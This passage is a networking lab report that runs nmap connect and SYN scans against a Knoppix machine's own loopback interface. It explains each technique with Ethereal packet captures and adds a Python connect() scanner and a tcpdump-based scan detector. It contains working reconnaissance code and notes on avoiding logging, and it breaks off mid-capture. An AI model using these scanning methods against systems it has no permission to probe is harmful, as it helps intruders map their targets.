
Nmap and TCPDump tests on Knoppix

Exercise 1: Port scanning with Nmap


1) Using Nmap, scan the TCP ports of your machine. Give the command and show the results.
For this part we used the Knoppix STD image supplied with the course material. Once Knoppix had booted we opened a terminal and became root in order to run nmap. (Root is required for the raw-socket scan types used later in this report, such as -sS and -sF; a plain connect scan, -sT, also works as an unprivileged user.) We then ran ifconfig to list the network interfaces and our IP addresses:

    knoppix@ttyp0[knoppix]$ rootme
    root@ttyp0[knoppix]# ifconfig
    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:12 errors:0 dropped:0 overruns:0 frame:0
              TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:600 (600.0 b)  TX bytes:600 (600.0 b)
    root@ttyp0[knoppix]#

As we can see, only the loopback interface is present, with the loopback address 127.0.0.1. We ran nmap against that address:

    root@ttyp1[knoppix]# nmap -sT -v 127.0.0.1

    Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
    Host Knoppix (127.0.0.1) appears to be up ... good.
    Initiating Connect() Scan against Knoppix (127.0.0.1)
    Adding open port 68/tcp
    Adding open port 6000/tcp
    The Connect() Scan took 0 seconds to scan 1605 ports.
    Interesting ports on Knoppix (127.0.0.1):
    (The 1603 ports scanned but not shown below are in state: closed)
    Port       State       Service
    68/tcp     open        dhcpclient
    6000/tcp   open        X11

    Nmap run completed -- 1 IP address (1 host up) scanned in 0.351 seconds

As the results show, nmap found two open TCP ports: 68 (dhcpclient, the DHCP client used to obtain IP addresses dynamically) and 6000 (X11, the X Window display of the Knoppix graphical environment, KDE in this case). According to nmap, the remaining TCP ports are closed. Note that the Service column is only a lookup of the port number in nmap's services table, not something the scan verified: without -sV, nmap never exchanges data with the listener. DHCP itself runs over UDP 67/68, so the label on 68/tcp deserves a second look; netstat -tlnp on the scanned host shows which process actually holds each listening socket.

1 of 32

2) Start a web server on your machine and repeat the previous exercise. Comment on the (predictable) differences between the two results.
We started the web server from the Knoppix graphical environment (KDE): main menu -> Servers -> server http -> start httpd. Once it was running we ran the same nmap command as before:
    root@ttyp1[knoppix]# nmap -sT -v 127.0.0.1

    Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
    Host Knoppix (127.0.0.1) appears to be up ... good.
    Initiating Connect() Scan against Knoppix (127.0.0.1)
    Adding open port 68/tcp
    Adding open port 80/tcp
    Adding open port 6000/tcp
    The Connect() Scan took 0 seconds to scan 1605 ports.
    Interesting ports on Knoppix (127.0.0.1):
    (The 1602 ports scanned but not shown below are in state: closed)
    Port       State       Service
    68/tcp     open        dhcpclient
    80/tcp     open        http
    6000/tcp   open        X11

    Nmap run completed -- 1 IP address (1 host up) scanned in 0.342 seconds

Now, as expected, nmap also reports TCP port 80, the http service, as open. Nothing else changed: the newly started httpd is the only difference between the two runs, so the only difference in the output is that extra line, and the count of closed ports drops from 1603 to 1602.

3) Start some other TCP service and repeat the scan.

To add another TCP service we started the ssh server, again from the Knoppix graphical environment (KDE): main menu -> Servers -> server ssh -> start sshd. Once it was running we ran the same nmap command as before:
    root@ttyp1[knoppix]# nmap -sT -v 127.0.0.1

    Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
    Host Knoppix (127.0.0.1) appears to be up ... good.
    Initiating Connect() Scan against Knoppix (127.0.0.1)
    Adding open port 68/tcp
    Adding open port 22/tcp
    Adding open port 6000/tcp
    Adding open port 80/tcp
    The Connect() Scan took 0 seconds to scan 1605 ports.
    Interesting ports on Knoppix (127.0.0.1):
    (The 1601 ports scanned but not shown below are in state: closed)
    Port       State       Service
    22/tcp     open        ssh
    68/tcp     open        dhcpclient
    80/tcp     open        http
    6000/tcp   open        X11

    Nmap run completed -- 1 IP address (1 host up) scanned in 0.346 seconds

As expected, nmap now finds port 22, the ssh (secure shell) service, open. Ports 68, 80 and 6000 remain open and the rest remain closed.
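What -sT does under the hood is the operating system's connect() call, one port at a time. The following is an added example, not part of the original report: a small connect() scanner in Python that reproduces the -sT behaviour against a listener it starts itself on the loopback interface, so it runs without root and without nmap. The listener, the free_port fixture and the function names are this example's own choices.

```python
import socket
import struct
import threading
from contextlib import closing

# Added example, not part of the original report: a minimal TCP connect()
# scanner that works the way `nmap -sT` does. It relies on the operating
# system's connect() call only, so it needs no root privileges, and it
# produces the same SYN / SYN,ACK / ACK / RST exchange seen in the captures.
# The listener and the helper names below are this example's own fixtures.


def scan_port(host, port, timeout=1.0):
    """Return 'open', 'closed' or 'filtered' for one TCP port."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)
        # SO_LINGER with a zero timeout makes close() send a RST instead of
        # the orderly FIN exchange, matching frame 4 of the connect-scan capture.
        s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0))
        try:
            s.connect((host, port))
        except ConnectionRefusedError:   # the stack answered our SYN with RST
            return "closed"
        except socket.timeout:           # no SYN,ACK and no RST: dropped somewhere
            return "filtered"
        return "open"                    # three-way handshake completed


def connect_scan(host, ports, timeout=1.0):
    """Scan several ports and return {port: state}, like one nmap -sT run."""
    return {port: scan_port(host, port, timeout) for port in ports}


def start_listener():
    """Constructed fixture: a throwaway service on an ephemeral loopback port.

    It accepts and immediately closes every connection, which is all a
    scanner ever triggers; the scanner never sends application data.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:              # listener closed: stop serving
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_port():
    """Constructed fixture: a loopback port that was just released.

    Nothing listens on it any more, so a SYN to it draws a RST. This is a
    practical choice for a demo, not a guarantee (another process could grab it).
    """
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, open_port = start_listener()
    closed_port = free_port()
    for port, state in sorted(connect_scan("127.0.0.1", [open_port, closed_port]).items()):
        print("%d/tcp\t%s" % (port, state))
    srv.close()
```

Run it while a sniffer is capturing on the loopback interface and the same four-packet exchange analysed in Exercise 2 (SYN, SYN/ACK, ACK, RST) appears for the open port, and SYN followed by RST for the closed one. The timeout branch is what nmap reports as filtered: neither a SYN/ACK nor a RST came back.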

Exercise 2: Different TCP scanning techniques


Start a sniffer (for example TCPdump, Snort or Ethereal) capturing the TCP packets that cross your machine's loopback interface. Then scan a single TCP port on which you know a service is running, and another on which you know nothing is running, with each of the following scanning techniques.

1) TCP connect scan


This is the most basic form of TCP scanning. The connect() system call provided by the operating system is used to open a connection to every port of interest on the target. If the port is listening, connect() succeeds; otherwise the port is reported unreachable. One important advantage of this technique is that no special privileges are needed: on most UNIX systems any user may issue this call. It is also easy to detect, because the target's logs show a burst of connections and error messages from services that accept() the connection only to have it closed immediately. As the open TCP port we used 80 (http); as the closed port we used 90, which the services table assigns to DNSIX Securit Attribute Token Map but on which nothing was listening. The nmap commands we used were:
    root@ttyp1[knoppix]# nmap -sT -P0 -v -p 80 127.0.0.1

    Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
    Host Knoppix (127.0.0.1) appears to be up ... good.
    Initiating Connect() Scan against Knoppix (127.0.0.1)
    Adding open port 80/tcp
    The Connect() Scan took 0 seconds to scan 1 ports.
    Interesting ports on Knoppix (127.0.0.1):
    Port       State       Service
    80/tcp     open        http

    Nmap run completed -- 1 IP address (1 host up) scanned in 0.012 seconds

    root@ttyp1[knoppix]# nmap -sT -P0 -v -p 90 127.0.0.1

    Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
    Host Knoppix (127.0.0.1) appears to be up ... good.
    Initiating Connect() Scan against Knoppix (127.0.0.1)
    The Connect() Scan took 0 seconds to scan 1 ports.
    The 1 scanned port on Knoppix (127.0.0.1) is: closed

    Nmap run completed -- 1 IP address (1 host up) scanned in 0.004 seconds

As we assumed, nmap reports port 80 open and port 90 closed. To capture the traffic generated by both commands we used the Ethereal sniffer with a capture filter restricted to TCP traffic on the loopback interface. The capture Ethereal produced for both commands was:
Frame 1 (74 on wire, 74 captured)
    Arrival Time: Mar 25, 2006 19:41:26.063931000
    Time delta from previous packet: 0.000000000 seconds
    Time relative to first packet: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 74 bytes
    Capture Length: 74 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 60
    Identification: 0x5374
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0xe945 (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 47228 (47228), Dst Port: www (80), Seq: 4140123558, Ack: 0, Len: 0
    Source port: 47228 (47228)
    Destination port: www (80)
    Sequence number: 4140123558
    Header length: 40 bytes
    Flags: 0x0002 (SYN)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..1. = Syn: Set
        .... ...0 = Fin: Not set
    Window size: 32767
    Checksum: 0x839c (correct)
    Options: (20 bytes)
        Maximum segment size: 16396 bytes
        SACK permitted
        Time stamp: tsval 399058, tsecr 0
        NOP
        Window scale: 0 bytes

Frame 2 (74 on wire, 74 captured)
    Arrival Time: Mar 25, 2006 19:41:26.063963000
    Time delta from previous packet: 0.000032000 seconds
    Time relative to first packet: 0.000032000 seconds
    Frame Number: 2
    Packet Length: 74 bytes
    Capture Length: 74 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 60
    Identification: 0x0000
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0x3cba (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: www (80), Dst Port: 47228 (47228), Seq: 4156044603, Ack: 4140123559, Len: 0
    Source port: www (80)
    Destination port: 47228 (47228)
    Sequence number: 4156044603
    Acknowledgement number: 4140123559
    Header length: 40 bytes
    Flags: 0x0012 (SYN, ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..1. = Syn: Set
        .... ...0 = Fin: Not set
    Window size: 32767
    Checksum: 0x3fbf (correct)
    Options: (20 bytes)
        Maximum segment size: 16396 bytes
        SACK permitted
        Time stamp: tsval 399058, tsecr 399058
        NOP
        Window scale: 0 bytes

Frame 3 (66 on wire, 66 captured)
    Arrival Time: Mar 25, 2006 19:41:26.063983000
    Time delta from previous packet: 0.000020000 seconds
    Time relative to first packet: 0.000052000 seconds
    Frame Number: 3
    Packet Length: 66 bytes
    Capture Length: 66 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 52
    Identification: 0x5375
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0xe94c (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 47228 (47228), Dst Port: www (80), Seq: 4140123559, Ack: 4156044604, Len: 0
    Source port: 47228 (47228)
    Destination port: www (80)
    Sequence number: 4140123559
    Acknowledgement number: 4156044604
    Header length: 32 bytes
    Flags: 0x0010 (ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 32767
    Checksum: 0xa8dc (correct)
    Options: (12 bytes)
        NOP
        NOP
        Time stamp: tsval 399058, tsecr 399058

Frame 4 (66 on wire, 66 captured)
    Arrival Time: Mar 25, 2006 19:41:26.064304000
    Time delta from previous packet: 0.000321000 seconds
    Time relative to first packet: 0.000373000 seconds
    Frame Number: 4
    Packet Length: 66 bytes
    Capture Length: 66 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 52
    Identification: 0x5376
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0xe94b (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 47228 (47228), Dst Port: www (80), Seq: 4140123559, Ack: 4156044604, Len: 0
    Source port: 47228 (47228)
    Destination port: www (80)
    Sequence number: 4140123559
    Acknowledgement number: 4156044604
    Header length: 32 bytes
    Flags: 0x0014 (RST, ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .1.. = Reset: Set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 32767
    Checksum: 0xa8d8 (correct)
    Options: (12 bytes)
        NOP
        NOP
        Time stamp: tsval 399058, tsecr 399058

Frame 5 (74 on wire, 74 captured)
    Arrival Time: Mar 25, 2006 19:41:34.067922000
    Time delta from previous packet: 8.003618000 seconds
    Time relative to first packet: 8.003991000 seconds
    Frame Number: 5
    Packet Length: 74 bytes
    Capture Length: 74 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 60
    Identification: 0x5c88
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0xe031 (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 47229 (47229), Dst Port: 90 (90), Seq: 4149691770, Ack: 0, Len: 0
    Source port: 47229 (47229)
    Destination port: 90 (90)
    Sequence number: 4149691770
    Header length: 40 bytes
    Flags: 0x0002 (SYN)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..1. = Syn: Set
        .... ...0 = Fin: Not set
    Window size: 32767
    Checksum: 0x800b (correct)
    Options: (20 bytes)
        Maximum segment size: 16396 bytes
        SACK permitted
        Time stamp: tsval 399858, tsecr 0
        NOP
        Window scale: 0 bytes

Frame 6 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:41:34.067948000
    Time delta from previous packet: 0.000026000 seconds
    Time relative to first packet: 8.004017000 seconds
    Frame Number: 6
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x0000
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0x3cce (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 90 (90), Dst Port: 47229 (47229), Seq: 0, Ack: 4149691771, Len: 0
    Source port: 90 (90)
    Destination port: 47229 (47229)
    Sequence number: 0
    Acknowledgement number: 4149691771
    Header length: 20 bytes
    Flags: 0x0014 (RST, ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .1.. = Reset: Set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 0
    Checksum: 0xbc23 (correct)

Ethereal captured six frames. In frame 1 nmap (from port 47228) sends a SYN to port 80 (http): the start of a connection attempt. In frame 2 port 80 answers port 47228 with SYN and ACK set, acknowledging the synchronisation request and sending its own, i.e. it is ready to accept requests, so the port is open and in service. In frame 3 nmap, again from port 47228, sends an ACK to port 80 acknowledging its SYN; at this point the three-way handshake is complete and the connection is established. In frame 4 nmap, from port 47228, sends RST and ACK to port 80 and tears the connection down abruptly (an abortive close with RST rather than the orderly FIN exchange), since the only purpose of the scan is to learn which ports are in service, nothing more.

nmap concludes that port 80 is active and in service at frame 2, when it receives SYN and ACK from port 80: the port confirms with its own SYN the connection attempt nmap made (also with a SYN). In frame 5 nmap, from port 47229, sends a SYN to port 90 attempting a connection. In frame 6 port 90 answers port 47229 with RST and ACK, ending the attempt; at this point nmap knows port 90 is closed (no service listening). Note that in this capture every packet, probes and replies alike, carries TTL 64, the DF bit and the kernel's usual options (MSS, SACK, timestamps, window scale): with -sT nmap never builds a packet itself, the Knoppix TCP stack produces all of them.
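The connect-scan description above says this technique is easy to spot because the target sees connections that are accepted and immediately closed. As an added example (not from the report), here is that observation as detection logic: it reads tcpdump output, groups packets into flows and labels each flow by the exchange it matches. The SAMPLE lines are constructed from the Ethereal captures in this report, rewritten in the format that tcpdump -i lo -n tcp prints, plus one ordinary HTTP exchange for contrast; the verdict names and the flow key are this example's own.

```python
import re
from collections import defaultdict

# Added example, not part of the lab report: the "easily detectable" remark
# made about connect() scans, turned into detection logic over tcpdump output.
# SAMPLE is constructed from the Ethereal captures in this report, rewritten in
# the syntax `tcpdump -i lo -n tcp` prints, plus one real HTTP exchange for
# contrast. Flow keys and verdict names are this example's own choices.
SAMPLE = """\
19:41:26.063931 IP 127.0.0.1.47228 > 127.0.0.1.80: Flags [S], seq 4140123558, win 32767, length 0
19:41:26.063963 IP 127.0.0.1.80 > 127.0.0.1.47228: Flags [S.], seq 4156044603, ack 4140123559, win 32767, length 0
19:41:26.063983 IP 127.0.0.1.47228 > 127.0.0.1.80: Flags [.], ack 1, win 32767, length 0
19:41:26.064304 IP 127.0.0.1.47228 > 127.0.0.1.80: Flags [R.], seq 1, ack 1, win 32767, length 0
19:41:34.067922 IP 127.0.0.1.47229 > 127.0.0.1.90: Flags [S], seq 4149691770, win 32767, length 0
19:41:34.067948 IP 127.0.0.1.90 > 127.0.0.1.47229: Flags [R.], seq 0, ack 4149691771, win 0, length 0
19:46:03.835948 IP 127.0.0.1.50785 > 127.0.0.1.80: Flags [S], seq 1334789943, win 1024, length 0
19:46:03.835984 IP 127.0.0.1.80 > 127.0.0.1.50785: Flags [S.], seq 133290923, ack 1334789944, win 32767, length 0
19:46:03.835998 IP 127.0.0.1.50785 > 127.0.0.1.80: Flags [R], seq 1334789944, win 0, length 0
19:50:00.000000 IP 127.0.0.1.40000 > 127.0.0.1.80: Flags [S], seq 1, win 32767, length 0
19:50:00.000050 IP 127.0.0.1.80 > 127.0.0.1.40000: Flags [S.], seq 1, ack 2, win 32767, length 0
19:50:00.000100 IP 127.0.0.1.40000 > 127.0.0.1.80: Flags [.], ack 1, win 32767, length 0
19:50:00.000200 IP 127.0.0.1.40000 > 127.0.0.1.80: Flags [P.], seq 1:17, ack 1, win 32767, length 16
19:50:00.003000 IP 127.0.0.1.80 > 127.0.0.1.40000: Flags [P.], seq 1:301, ack 17, win 32767, length 300
19:50:00.004000 IP 127.0.0.1.40000 > 127.0.0.1.80: Flags [F.], seq 17, ack 301, win 32767, length 0
"""

LINE = re.compile(r"^(\d+):(\d+):(\d+\.\d+) IP (\S+?)\.(\d+) > (\S+?)\.(\d+): "
                  r"Flags \[([^\]]*)\].*?length (\d+)")

def parse(text):
    """Yield (time_s, src, sport, dst, dport, flags, payload_len) per line."""
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            h, mi, s, src, sp, dst, dp, flags, ln = m.groups()
            yield (int(h) * 3600 + int(mi) * 60 + float(s),
                   src, int(sp), dst, int(dp), flags, int(ln))

def group_flows(text):
    """Group packets per connection; the first packet seen marks the client side."""
    flows = defaultdict(list)
    for t, src, sp, dst, dp, flags, ln in parse(text):
        reverse = (dst, dp, src, sp)
        if reverse in flows:                      # reply: server -> client
            flows[reverse].append((t, False, flags, ln))
        else:                                     # client -> server
            flows[(src, sp, dst, dp)].append((t, True, flags, ln))
    return flows

def classify_flow(packets):
    """Label one flow by the exchange it matches (see the captures above).

    connect_scan: client S, server S., client ., client R/R., zero payload
    syn_scan    : client S, server S., client R (bare RST, handshake never done)
    refused     : client S answered by server R. (closed port, any technique)
    data        : payload was exchanged, i.e. a real client, not a probe
    """
    if sum(ln for _, _, _, ln in packets):
        return "data"
    seq = [(from_client, flags) for _, from_client, flags, _ in packets]
    if seq[:2] == [(True, "S"), (False, "R.")]:
        return "refused"
    if seq[:2] != [(True, "S"), (False, "S.")]:
        return "other"
    rest = [flags for from_client, flags in seq[2:] if from_client]
    if rest[:1] == ["R"]:
        return "syn_scan"
    if rest[:1] == ["."] and len(rest) > 1 and rest[1].startswith("R"):
        return "connect_scan"
    return "other"

def detect(text):
    """Return {(client, cport, server, sport): verdict} for every flow."""
    return {key: classify_flow(pkts) for key, pkts in group_flows(text).items()}

def scan_sources(verdicts):
    """Per client IP: ports probed and techniques seen. Alerting once `ports`
    grows past a threshold inside a time window is left to the caller."""
    summary = defaultdict(lambda: {"ports": set(), "techniques": set()})
    for (client, _, _, dport), verdict in verdicts.items():
        if verdict in ("connect_scan", "syn_scan", "refused"):
            summary[client]["ports"].add(dport)
            if verdict != "refused":
                summary[client]["techniques"].add(verdict)
    return dict(summary)

if __name__ == "__main__":
    verdicts = detect(SAMPLE)
    for (client, cport, server, sport), verdict in verdicts.items():
        print("%s:%d -> %s:%d  %s" % (client, cport, server, sport, verdict))
    print(scan_sources(verdicts))
```

The telling feature is not the SYN but what follows it: a client that completes the handshake and then sends RST with zero bytes of payload is a connect() scanner, a client that answers the SYN,ACK with a bare RST (no ACK flag) is a half-open scanner, and a SYN met by RST,ACK is a probe of a closed port. Counting distinct ports per client over a time window turns the per-flow verdicts into an alert; the threshold is a local decision and deliberately not hard-coded here.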

2) TCP SYN scan


This technique is often called "half open" scanning, because a full TCP connection is never opened. A SYN packet is sent as if a real connection were about to be opened, and a reply is awaited. A SYN,ACK indicates that the port is listening; a RST indicates that it is not. If a SYN,ACK is received, a RST is sent immediately to abort the connection (in fact it is our operating system's kernel that does this for us, because it has no socket matching the SYN,ACK). The main advantage of this technique is that far fewer hosts log it than the previous one. Unfortunately, root privileges are needed to build these raw SYN packets. The nmap commands we used were:
    root@ttyp1[knoppix]# nmap -sS -P0 -v -p 80 127.0.0.1

    Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
    Host Knoppix (127.0.0.1) appears to be up ... good.
    Initiating SYN Stealth Scan against Knoppix (127.0.0.1)
    Adding open port 80/tcp
    The SYN Stealth Scan took 0 seconds to scan 1 ports.
    Interesting ports on Knoppix (127.0.0.1):
    Port       State       Service
    80/tcp     open        http

    Nmap run completed -- 1 IP address (1 host up) scanned in 0.013 seconds

    root@ttyp1[knoppix]# nmap -sS -P0 -v -p 90 127.0.0.1

    Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
    Host Knoppix (127.0.0.1) appears to be up ... good.
    Initiating SYN Stealth Scan against Knoppix (127.0.0.1)
    The SYN Stealth Scan took 0 seconds to scan 1 ports.
    The 1 scanned port on Knoppix (127.0.0.1) is: closed

    Nmap run completed -- 1 IP address (1 host up) scanned in 0.004 seconds

The capture Ethereal produced for both commands was:
Frame 1 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:46:03.835948000
    Time delta from previous packet: 0.000000000 seconds
    Time relative to first packet: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x62a7
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 40
    Protocol: TCP (0x06)
    Header checksum: 0x3227 (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 50785 (50785), Dst Port: www (80), Seq: 1334789943, Ack: 0, Len: 0
    Source port: 50785 (50785)
    Destination port: www (80)
    Sequence number: 1334789943
    Header length: 20 bytes
    Flags: 0x0002 (SYN)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..1. = Syn: Set
        .... ...0 = Fin: Not set
    Window size: 1024
    Checksum: 0x5068 (correct)

Frame 2 (58 on wire, 58 captured)
    Arrival Time: Mar 25, 2006 19:46:03.835984000
    Time delta from previous packet: 0.000036000 seconds
    Time relative to first packet: 0.000036000 seconds
    Frame Number: 2
    Packet Length: 58 bytes
    Capture Length: 58 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 44
    Identification: 0x0000
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0x3cca (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: www (80), Dst Port: 50785 (50785), Seq: 133290923, Ack: 1334789944, Len: 0
    Source port: www (80)
    Destination port: 50785 (50785)
    Sequence number: 133290923
    Acknowledgement number: 1334789944
    Header length: 24 bytes
